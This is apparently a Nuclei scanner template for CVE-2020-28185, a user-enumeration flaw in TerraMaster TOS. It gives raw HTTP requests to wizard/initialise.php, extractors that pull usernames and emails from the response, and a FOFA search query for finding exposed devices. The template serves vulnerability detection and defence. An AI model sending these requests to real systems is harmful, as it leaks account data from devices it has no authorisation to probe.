id: CVE-2020-28185 info: name: TerraMaster TOS < 4.2.06 - User Enumeration author: pussycat0x severity: medium description: | User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php. remediation: | Upgrade TerraMaster TOS to version 4.2.06 or later. reference: - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md - https://nvd.nist.gov/vuln/detail/CVE-2020-28185 - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/ - https://www.terra-master.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2020-28185 epss-score: 0.00454 epss-percentile: 0.72459 cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: terra-master product: tos fofa-query: '"TerraMaster" && header="TOS"' tags: cve,cve2020,terramaster,enum,tos http: - raw: - | GET /tos/index.php?user/login HTTP/1.1 Host: {{Hostname}} - | POST /wizard/initialise.php HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: {{RootURL}}/tos/index.php?user/login tab=checkuser&username=admin cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - '"username":' - '"email":' - '"status":' condition: and - type: status status: - 200 extractors: - type: regex part: body_2 regex: - '"username":"(.*?)"' - '"email":"(.*?)"' # digest: 4b0a00483046022100c10e504c5cb1ccca231c45880fc61ac5be6645bae0eb53959e52079b396209b0022100b83d86fc170cb37aa8bfe0f7e0194d80169133835d1cd2df4905c0af9213d4f7:922c64590222798bb761d5b6d8e72950